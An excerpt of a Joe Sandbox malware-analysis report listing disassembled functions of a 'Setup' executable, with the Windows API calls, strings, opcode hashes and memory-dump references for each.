                                                              • String ID: %TEMP%
                                                              • API String ID: 3727483831-235365282
                                                              • Opcode ID: 59e8683ff589aa0633a3c164056b4e0608a411bc3d065e4eb48e48e6254c61f5
                                                              • Instruction ID: 6e24e177da9ac5b82e138b9c4f16d98d45eab54ddeb25a797b6d0f9de29223b7
                                                              • Opcode Fuzzy Hash: 59e8683ff589aa0633a3c164056b4e0608a411bc3d065e4eb48e48e6254c61f5
                                                              • Instruction Fuzzy Hash: 10214F3290010A9BDF14DBB8C8417EEB7B4AF31328F144656E160EBBD5DB74DA188B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C922677 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92267E
                                                                • Part of subcall function 6C9189B7: __EH_prolog3.LIBCMT ref: 6C9189BE
                                                                • Part of subcall function 6C9189B7: __CxxThrowException@8.LIBCMT ref: 6C918A89
                                                                • Part of subcall function 6C922811: __EH_prolog3.LIBCMT ref: 6C922818
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: ReturnCode
                                                              • API String ID: 2489616738-1214168914
                                                              • Opcode ID: d5e7325b59380783f2b11ec7421cc56b6255cb47f63af28d8e1048a972366205
                                                              • Instruction ID: a92c8f666e41b1c3f843feb7d3e4089ed7c513f8b526e68a47fe3379e0a81112
                                                              • Opcode Fuzzy Hash: d5e7325b59380783f2b11ec7421cc56b6255cb47f63af28d8e1048a972366205
                                                              • Instruction Fuzzy Hash: CB21A1B0A11314DFCB04CF6CC881A9E7BA8BF29714B14855AF424DFB85C770D914CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95A11D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: %TEMP%
                                                              • API String ID: 431132790-235365282
                                                              • Opcode ID: 85fb70ad098afdecc617a2f4e776c1d46fd6b2a4121ffe559055ec46c1aed7a8
                                                              • Instruction ID: c2290c166b2f1be17775ea3234c44aab269bd96a3fae788f1ff056a768fee661
                                                              • Opcode Fuzzy Hash: 85fb70ad098afdecc617a2f4e776c1d46fd6b2a4121ffe559055ec46c1aed7a8
                                                              • Instruction Fuzzy Hash: F2215171A1021AAFDF04DFA0CC88AEE7775FF24319F404524F915AAA90CB70DA15CBB4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C959293 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCommandLineW.KERNEL32(512AC3CC,6C94831D,?,00000000,6C984C14,000000FF,?,6C947793,?,00000000), ref: 6C9592BF
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandLine
                                                              • String ID: repair
                                                              • API String ID: 1384747822-2397320225
                                                              • Opcode ID: 6d9c4c50acd8f7e40fb9a2bc4d91c422115672e86cea3f0d100fbbf68c83a54a
                                                              • Instruction ID: 3d18e5173f2c08759ddaf55780021976cb7bdce09a750cf4428a0d4b7cad4c3e
                                                              • Opcode Fuzzy Hash: 6d9c4c50acd8f7e40fb9a2bc4d91c422115672e86cea3f0d100fbbf68c83a54a
                                                              • Instruction Fuzzy Hash: 1811E67254C344ABD700CB64CC45F9A73ECEB6A738F140A1AB96193ED0DB30D504CA82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C48FF39 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowPlacement.USER32(?,?), ref: 6C48FF6A
                                                                • Part of subcall function 6C4A76EE: _calloc.LIBCMT ref: 6C4A770F
                                                                • Part of subcall function 6C4A83ED: __CxxThrowException@8.LIBCMT ref: 6C4A83E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8PlacementThrowWindow_calloc
                                                              • String ID: ,
                                                              • API String ID: 1982324250-3772416878
                                                              • Opcode ID: db830226f0c87db632e4170c75ba93d180f63fbe664b5d99d6d8e865c69418ec
                                                              • Instruction ID: 5df8e379d890cafeec70b05651ae04e9ba5a35e8f0cc30bfc239ccc079b423be
                                                              • Opcode Fuzzy Hash: db830226f0c87db632e4170c75ba93d180f63fbe664b5d99d6d8e865c69418ec
                                                              • Instruction Fuzzy Hash: 051148B6A02208AFDB00DFA9D880D9EF7F5FF49314B21442AE959A3700D730F945CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C934682 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C934689
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: #(loc.
                                                              • API String ID: 431132790-1630946291
                                                              • Opcode ID: 64b37f27948ef502c9baf50de3baf69b5a39ef8138ac5ebdd2a02b077009f120
                                                              • Instruction ID: 7c3c7dc4a123df63bf738ce9c1f911796b745422042fbafc83eb23aa02680462
                                                              • Opcode Fuzzy Hash: 64b37f27948ef502c9baf50de3baf69b5a39ef8138ac5ebdd2a02b077009f120
                                                              • Instruction Fuzzy Hash: 4F11F775901209DFDF10CFA8C945AEDB7B4BF25328F008656F820ABB80D774DA198BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9297CE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9297D5
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: RetryHelper
                                                              • API String ID: 431132790-1997034708
                                                              • Opcode ID: 5cb0bd99b4080e8cf06718264d0c365b590420b7c9cc857234d0c175a78201af
                                                              • Instruction ID: cf6ad03f416bb4bd3e7f5494a92de25080886b942760d13e09bb678c4cb3c190
                                                              • Opcode Fuzzy Hash: 5cb0bd99b4080e8cf06718264d0c365b590420b7c9cc857234d0c175a78201af
                                                              • Instruction Fuzzy Hash: 35F01DB1A01305DFCB20DFA4C901ADEB7E4BF24354B008819E469DBF40D730D914CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91388B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Entering Function
                                                              • API String ID: 431132790-2002471330
                                                              • Opcode ID: 817d33a42d9359fd69b4bc58be2c2f52e454ae9c7b9011337aef8622b75a1cbf
                                                              • Instruction ID: 3a3012f850e23250eb0fe1d4354448f6322a46be9eb610ee5a15c27b3eb3110e
                                                              • Opcode Fuzzy Hash: 817d33a42d9359fd69b4bc58be2c2f52e454ae9c7b9011337aef8622b75a1cbf
                                                              • Instruction Fuzzy Hash: FBF032356002019FDB20DF68C940B9DB7E0EF64714F00C80AE895CBB50CB34E860CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9138D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • exiting function/method, xrefs: 6C9138EF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: exiting function/method
                                                              • API String ID: 431132790-2452647166
                                                              • Opcode ID: 537d03246afba34fac978da8bdfad4cb7be63d267e24ce4941db782ea64c767e
                                                              • Instruction ID: 428ee540f7fa789f9764d51bdead9934710a90ebeddfed99f9872996e7525383
                                                              • Opcode Fuzzy Hash: 537d03246afba34fac978da8bdfad4cb7be63d267e24ce4941db782ea64c767e
                                                              • Instruction Fuzzy Hash: 00E0E5352016019FD720DFA8C158B49B7A1FF68315F108498E6559FBA0CB31E824CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C914412 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C914419
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C913C8F: __EH_prolog3.LIBCMT ref: 6C913C96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: ParameterFolder
                                                              • API String ID: 431132790-2570462325
                                                              • Opcode ID: 1ad1c27369fe1d6fd1d5b93b0fdb9861489f62853edf967c3180d73173622f7b
                                                              • Instruction ID: dab4ba8cff2e619adc99eabcbde083424bd6cc075d6e0eb15a4e11bbc0e6d627
                                                              • Opcode Fuzzy Hash: 1ad1c27369fe1d6fd1d5b93b0fdb9861489f62853edf967c3180d73173622f7b
                                                              • Instruction Fuzzy Hash: 03E01271901109ABDF14EBA4CC00BED7371BF30319F108A04E520AAF80C730D928D764
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4909A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(RICHED20.DLL,?,6C49CA98,00000000,00000001,?,80070057,6C485D9C,?,00000030,80070057), ref: 6C4909C9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: RICHED20.DLL
                                                              • API String ID: 1029625771-992299850
                                                              • Opcode ID: 5a114f949e221eb9b61d98907152091a6ff1842653ee5a7badb9a1cf200d5c39
                                                              • Instruction ID: 16aeff441ed4c9e285212dda87f8e3c80d2d5676e166ea9ce362c4b35bcb92d5
                                                              • Opcode Fuzzy Hash: 5a114f949e221eb9b61d98907152091a6ff1842653ee5a7badb9a1cf200d5c39
                                                              • Instruction Fuzzy Hash: F1E0FEB1A02B408F8760DF6B9944942FBF8BFAA6103104A1FE09AC2A24D7B0E1458F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C623536 Relevance: 3.2, APIs: 2, Instructions: 213COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ctype.LIBCPMT ref: 6C632015
                                                              • ctype.LIBCPMT ref: 6C63202A
                                                                • Part of subcall function 6C6217EB: malloc.MSVCRT ref: 6C6217F6
                                                                • Part of subcall function 6C622885: InitializeCriticalSectionAndSpinCount.KERNEL32(00000004,00000FA0,?,00000000,00000000), ref: 6C6228C4
                                                                • Part of subcall function 6C623992: EnterCriticalSection.KERNEL32(?,00000000,6C62397F,00000000,6C62371E,80004005), ref: 6C6239AE
                                                                • Part of subcall function 6C622C9B: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,6C6227B0,00000000,6C640088), ref: 6C622D01
                                                                • Part of subcall function 6C622C9B: VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,6C6227B0,00000000,6C640088), ref: 6C622D4F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalSectionVirtualctype$CountEnterInitializeSpinmalloc
                                                              • String ID:
                                                              • API String ID: 738331480-0
                                                              • Opcode ID: 76671d91761310ff62cd2a78544bd6e9be0a305812316b439c8fd83eea35ed7e
                                                              • Instruction ID: b6923bc0ed04d0e59047fd9a54eecf0a423b921be69d9d4e9a1a38604356d984
                                                              • Opcode Fuzzy Hash: 76671d91761310ff62cd2a78544bd6e9be0a305812316b439c8fd83eea35ed7e
                                                              • Instruction Fuzzy Hash: 4971D231254290AFDB209F11CC84F9A3BE5BB0275CF20A86CE9599BEA1C779D449CF5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C913C8F Relevance: 3.1, APIs: 2, Instructions: 135COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913C96
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              • _wcspbrk.LIBCMT ref: 6C913DF7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_wcspbrk
                                                              • String ID:
                                                              • API String ID: 1958752295-0
                                                              • Opcode ID: e7ed8cb27c5e03e75513f1b89c116641b68f377ce1ba899da58c7e5b506aa0fa
                                                              • Instruction ID: a0537cb968d6c8e3f41e4606ff5264375bfcc3750ca53127020b8d1d52111086
                                                              • Opcode Fuzzy Hash: e7ed8cb27c5e03e75513f1b89c116641b68f377ce1ba899da58c7e5b506aa0fa
                                                              • Instruction Fuzzy Hash: 49410831600109ABCB15EFB9C8809ED77A5AF7431CF14C616E920DFF81D730DA098795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C924613 Relevance: 3.1, APIs: 2, Instructions: 59registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C96847A: RegCloseKey.ADVAPI32(?,?,?,6C92463B,00000034,00000034,00000000), ref: 6C9684BA
                                                              • RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C9242F8,6C90A794,02642228), ref: 6C92468D
                                                              • RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C9242F8,6C90A794,02642228), ref: 6C92469E
                                                                • Part of subcall function 6C9683D2: RegQueryValueExW.ADVAPI32(00000000,00000034,00000000,00000034,00000034,00000000,?,?,6C924685,?,?,6C9242F8,00000034,00000034,00000034,00000034), ref: 6C9683F4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Close$QueryValue
                                                              • String ID:
                                                              • API String ID: 2393043351-0
                                                              • Opcode ID: f0602786051a395f71f58a076afc52b689380acf7db285c80d96bd8bdda3cfd2
                                                              • Instruction ID: 8c72fdbec877a5f06d05a8e1864f615978f05c3172f5d18bf21dcd18043d9a2d
                                                              • Opcode Fuzzy Hash: f0602786051a395f71f58a076afc52b689380acf7db285c80d96bd8bdda3cfd2
                                                              • Instruction Fuzzy Hash: BD110475E10229EFCF11DF96C90489EBB7AEF99708B144062F850A3614D3B4DA15DFD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C943114 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch_free
                                                              • String ID:
                                                              • API String ID: 2207867443-0
                                                              • Opcode ID: 9151c22400c0620590251b8a75f6b5459ecccabee5b9bc773e9f403ace8473aa
                                                              • Instruction ID: 6fa08fc6424546df0f4fcac47ba46d74c2188835408d250d2ec31fc6f1c1e8be
                                                              • Opcode Fuzzy Hash: 9151c22400c0620590251b8a75f6b5459ecccabee5b9bc773e9f403ace8473aa
                                                              • Instruction Fuzzy Hash: 0B11AF70A05205EFEF00CBB4C5447ACB7B0BF25319F208559D429ABAC1C775DB58CAA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C943B2B Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C943B32
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C944513: __CxxThrowException@8.LIBCMT ref: 6C9445A2
                                                                • Part of subcall function 6C918168: GetFileSize.KERNEL32(?,?,?,?,?,6C943B9F,?,?,00000000,?,?,?,?,00000008,6C94EC79,?), ref: 6C918178
                                                              • InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C94EC79,?,?), ref: 6C943BC9
                                                                • Part of subcall function 6C9180F7: WriteFile.KERNEL32(?,?,?,?,00000000,?,6C9460F1), ref: 6C91810D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FileH_prolog3$CriticalException@8InitializeSectionSizeThrowWrite
                                                              • String ID:
                                                              • API String ID: 593797809-0
                                                              • Opcode ID: c100caa9cb3c187bda9bfe6fbe815ecf3a0eae5f3032e5f0cabcdc513c55eda1
                                                              • Instruction ID: cb7950be594f73b74fc95005f4e64c8a78257b96df6f8390e1ee137521cc2fd9
                                                              • Opcode Fuzzy Hash: c100caa9cb3c187bda9bfe6fbe815ecf3a0eae5f3032e5f0cabcdc513c55eda1
                                                              • Instruction Fuzzy Hash: 3C1172B150124AEFDB10CFA4C945BDEBBB9BF25704F508406E554A7E41C770EA28CBE2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C951315 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                              Download Yara Rule
